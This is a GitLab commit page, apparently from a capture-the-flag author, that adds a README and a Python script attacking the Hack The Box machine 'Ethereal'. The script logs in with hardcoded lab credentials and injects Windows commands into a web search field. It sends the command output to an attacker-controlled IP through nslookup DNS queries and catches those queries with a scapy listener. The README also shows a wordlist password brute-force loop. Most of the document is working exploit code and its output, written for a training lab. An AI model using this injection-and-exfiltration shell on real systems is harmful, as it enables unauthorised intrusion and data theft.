Commit 6b8492d4 authored by 0xdf's avatar 0xdf

ethereal

parent 309037a4
## Challenge
[Ethereal](https://www.hackthebox.eu/home/machines/profile/157) from Hackthebox.eu
## ethereal_shell.py
### Description
Performs blind injection into webpage, with return comms over DNS. Script uses scapy to listen for and reply to DNS requests generated by the injection.
### Reference
Originally published in blog posts: https://0xdf.gitlab.io/ethereal/3/
### Dependencies
- python scapy
- python cmd
### Usage
```
root@kali:~/hackthebox/ethereal-10.10.10.106# ./ethereal_shell.py
[*] Starting DNS Sniffer on tun0 for target 10.10.10.106.
[*] Logging in and fetching state information.
[+] State information received.
ethereal> dir \
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:
07/07/2018 09:57 PM <DIR> Audit
06/30/2018 10:10 PM <DIR> inetpub
06/26/2018 05:51 AM <DIR> Program Files
07/16/2018 08:55 PM <DIR> Program Files (x86)
07/05/2018 09:38 AM <DIR> Users
07/01/2018 09:57 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 15,403,929,600 bytes free
ethereal> whoami
etherealalan
```
## pbox.bas
### Description
Modified PasswordBox Application which takes a password as the first argument. If the password is good, it prints a message and returns 0. Else, it returns 1.
### Reference
Originally published in blog posts: https://0xdf.gitlab.io/ethereal/2/
### Usage
```
root@kali# fbc -lang deprecated pbox.bas
root@kali# time for pass in $(cat /usr/share/seclists/Passwords/darkweb2017-top1000.txt); do ./pbox $pass; done
Password Found: password
real 0m5.808s
user 0m1.593s
sys 0m1.096s
```
#!/usr/bin/env python3
import requests
import sys
import time
from bs4 import BeautifulSoup
from cmd import Cmd
from requests.auth import HTTPBasicAuth
from scapy.all import *
from threading import Thread
kill_domain = "0xdf.0xdf."
class dns_sniff(Thread):
def __init__(self, interface='tun0', target_ip='10.10.10.106'):
super().__init__()
self.interface = interface
self.target_ip = target_ip
def run(self):
print(f"[*] Starting DNS Sniffer on {self.interface} for target {self.target_ip}.")
sniff(iface=self.interface, filter=f"src host {self.target_ip} and udp port 53",
prn=self.parse_packet, stop_filter=lambda p: p.haslayer(DNS) and
p.getlayer(DNS).qd.qname.decode('utf-8') == kill_domain)
print(f"[*] Received kill packet. Shutting down sniffer thread.")
def parse_packet(self, p):
if p.haslayer(DNS) and p.getlayer(DNS).qd.qtype == 1:
domain = p.getlayer(DNS).qd.qname.decode('utf-8')
if domain == kill_domain: return
print(domain[1:-2].replace('X.Q',' ').strip())
reply = IP(dst=p[IP].src)/UDP(dport=p[UDP].sport, sport=53)/DNS(id=p[DNS].id,
ancount=1, an=DNSRR(rrname=p[DNSQR].qname, rdata='127.0.0.1')/DNSRR(rrname=domain,
rdata='127.0.0.1'))
send(reply, verbose=0, iface=self.interface)
class Terminal(Cmd):
prompt = "ethereal> "
def __init__(self, proxy=None):
super().__init__()
self.proxy = proxy or {}
self.auth = HTTPBasicAuth('alan','!C414m17y57r1k3s4g41n!')
self.do_login()
self.fail_count = 0
def do_login(self, args=''):
print("[*] Logging in and fetching state information.")
resp = requests.get('http://ethereal.htb:8080/', auth=self.auth, proxies=self.proxy)
soup = BeautifulSoup(resp.text, 'html.parser')
self.view_state = soup.find("input", id="__VIEWSTATE").get('value')
self.view_state_gen = soup.find("input", id="__VIEWSTATEGENERATOR").get('value')
self.event_val = soup.find("input", id="__EVENTVALIDATION").get('value')
print("[+] State information received.")
def send_post(self, search):
data = {'__VIEWSTATE': self.view_state,
'__VIEWSTATEGENERATOR': self.view_state_gen,
'__EVENTVALIDATION': self.event_val,
'search': search,
'ctl02': ''}
try:
start = time.time()
resp = requests.post('http://ethereal.htb:8080/',
proxies=self.proxy,
data = data,
auth = self.auth,
timeout=120)
if resp.status_code == 500 and time.time() - start < 30:
print("[-] Unable to connect to Ethereal\n[*] Running login")
self.do_login()
print("[*] Try running the command again.")
except requests.exceptions.Timeout:
pass
def do_exit(self, args=''):
print("[*] Sending kill request.")
self.send_post(f'& nslookup {kill_domain} 10.10.14.14')
sys.exit()
def default(self, args):
command = f'''& (FOR /F "tokens=1-26" %a IN ('{args}') DO ( nslookup "Q%aX.Q%bX.Q%cX.Q%dX.Q%eX.Q%fX.Q%gX.Q%hX.Q%iX.Q%jX.Q%kX.Q%lX.Q%mX.Q%nX.Q%oX.Q%pX.Q%qX.Q%rX.Q%sX.Q%tX.Q%uX.Q%vX.Q%wX.Q%xX.Q%yX.Q%zX" 10.10.14.14 ))'''
self.send_post(command)
def do_quiet(self, args):
command = f'& ( {args} )'
self.send_post(command)
#dns = dns_sniff(interface='eth0', target_ip='10.1.1.153')
dns = dns_sniff()
dns.start()
term = Terminal(proxy={"http": "http://127.0.0.1:8080"})
try:
term.cmdloop()
except KeyboardInterrupt:
term.do_exit()
This diff is collapsed.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment